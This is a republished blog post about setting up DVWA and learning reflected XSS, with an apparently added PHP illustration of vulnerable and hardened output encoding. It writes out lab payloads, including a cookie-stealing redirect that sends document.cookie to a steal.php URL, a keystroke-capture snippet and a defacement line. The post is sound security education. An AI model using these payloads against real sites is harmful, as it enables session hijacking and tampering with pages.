A Personal Journey: Understanding Reflected XSS Through My DVWA Setup



This content originally appeared on DEV Community and was authored by Samuel Adeduntan

My Overview of Web Application Security

Sharing my own experience of finding and comprehending Reflected XSS vulnerabilities excites me. Setting up DVWA (Damn Vulnerable Web Application) was the ideal hands-on learning environment for me as someone who has been studying cybersecurity. Allow me to take you through my journey, including the challenges, discoveries, and important lessons I’ve learnt.

My Setup Obstacles: The Start of Real-World Education

The Docker Obstacle

When I first started out, I believed that Docker would be the simplest route:

(Screenshot: the Docker hurdle)

But I quickly hit my first roadblock: Command 'docker' not found

This taught me my first lesson: assumptions about pre-installed tools can derail your progress. Rather than getting frustrated, I pivoted to a manual installation.

My Manual DVWA Installation
I decided to go the traditional route:

(Screenshot: installation command)

The permission issues were expected but easily solved.

(Screenshot: permission issues)

Database Configuration: My Biggest Challenge

Here’s where things got interesting for me. The database conflicts were real:

(Screenshot: database configuration)

The control procedure ended with an error code, which is why the mariadb.service job failed.

I found that MySQL was already operating on XAMPP:

(Screenshot)

Working directly with the MariaDB system and terminating XAMPP’s service was the solution:

(Screenshot)

My Password Reset Adventure

I encountered authentication issues and had to reset the MySQL root password:

(Screenshot)

Next, in a different terminal I input this (the WHERE clause limits the change to the root account, and FLUSH PRIVILEGES makes the new password take effect):
MariaDB [(none)]> UPDATE mysql.user SET authentication_string=PASSWORD('mynewpassword') WHERE User='root';
MariaDB [(none)]> FLUSH PRIVILEGES;

I learned more about database administration from this practical troubleshooting than from any tutorial!

My Exploration of Reflected XSS

First Contact with the Vulnerability

After finally getting DVWA running, I navigated to the reflected XSS section. The simple form asking for my name seemed innocent enough, but I knew better.

My first test was classic:

<script>alert('XSS Success!')</script>

I was both excited and concerned when the alert appeared; I was excited to realize how vulnerable I was, and I was worried about how widespread this must be in the wild.

Developing My Understanding

I spent hours experimenting with different payloads:

  • Cookie stealing attempts (in my controlled environment): document.location='http://localhost/steal.php?cookie='+document.cookie
  • Keylogger simulations: document.onkeypress = function(e) { console.log(e.key); }
  • Defacement tests: document.body.innerHTML = '<h1>This site has been hacked</h1>';

I gained a deeper comprehension of the possible impact with each trial.

Some of my “Aha!” moments

The Understanding of Input Sanitization

Upon examining the susceptible code, I realized why this occurred:

(Screenshot)

The application made a risky assumption by fully trusting user input.

The Disclosure of Security Levels

It was enlightening to experiment with various DVWA security levels:

  • Low: No defense
  • Medium: Simple filtering that can be evaded
  • High: Using htmlspecialchars() for proper sanitization

This demonstrated to me how protective tactics have changed over time.

My Personal Security Lessons

The Things I Discovered About Prevention

  • Always validate input – I now see why this is rule #1.
  • Use context-appropriate output encoding – HTML, JavaScript, and URL contexts each need different escaping.
  • Implement CSP headers – they offer a crucial additional layer of defense.
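To make the "Aha!" moment about trusting input and the three prevention lessons concrete, here is an added example (my own illustration, not DVWA's source or the original post's code) of a DVWA-style greeting handler: the low-security version that echoes the name unchanged, the hardened version using htmlspecialchars(), separate encoding for JavaScript and URL contexts, and a CSP header. The path /hello.php and all function names are assumptions.

```php
<?php
// Added example, not DVWA's own code: a "What's your name?" handler
// in its vulnerable form and in a hardened form.

// Low security: the parameter is echoed straight back into the page, so
// anything that looks like markup is parsed by the browser as markup.
function render_low(string $name): string
{
    return '<pre>Hello ' . $name . '</pre>';
}

// Hardened, HTML body context: htmlspecialchars() with ENT_QUOTES turns
// < > & " ' into entities, so a <script> payload is shown as text, not run.
function render_high(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<pre>Hello ' . $safe . '</pre>';
}

// JavaScript context: HTML entities do not help inside a <script> block.
// json_encode() builds a JS string literal with the dangerous characters
// (< > & ' ") hex-escaped, so the value cannot close the string or the tag.
function render_in_script(string $name): string
{
    $js = json_encode($name, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return '<script>var visitor = ' . $js . ';</script>';
}

// URL context: percent-encode the value before placing it in a query string,
// then HTML-encode the finished URL because it lands in an attribute.
// (/hello.php is an assumed path, not DVWA's.)
function render_link(string $name): string
{
    $href = '/hello.php?name=' . rawurlencode($name);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">again</a>';
}

// Defence in depth (the CSP lesson): allow scripts only from this origin, so
// even an encoding spot that was missed cannot run inline script.
// Must be sent before any output.
function send_csp_header(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
}

// Demo with a constructed payload (the classic alert test).
$payload = "<script>alert('XSS Success!')</script>";
send_csp_header();
echo render_low($payload), PHP_EOL;        // a browser would execute this
echo render_high($payload), PHP_EOL;       // displayed as harmless text
echo render_in_script($payload), PHP_EOL;
echo render_link($payload), PHP_EOL;
```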

My Shifted Viewpoint

Before this hands-on experience, XSS was just a theoretical concept to me, but now:

  • When I write code, input validation comes to mind right away.
  • I inspect web applications more critically.
  • I understand why security headers matter.

My Advice to Fellow Learners

If you’re starting your security journey:

  • Expect setup challenges – They’re learning opportunities in disguise
  • Experiment safely – Use environments like DVWA, not real websites
  • Understand the why – Don’t just execute payloads; understand how they work
  • Learn prevention – Understanding attacks is useless without knowing defense

My Continuing Journey

This DVWA setup and XSS exploration was just the beginning for me. I’m now exploring:

  • Stored XSS vulnerabilities
  • DOM-based XSS
  • Advanced filtering bypass techniques
  • Automated vulnerability scanning

Every day brings new challenges and learning opportunities in this fascinating field.

My own experiences learning about web application security are reflected in my personal journey. Don’t forget to only test systems you own or have authorization to test, and always practice ethical hacking.

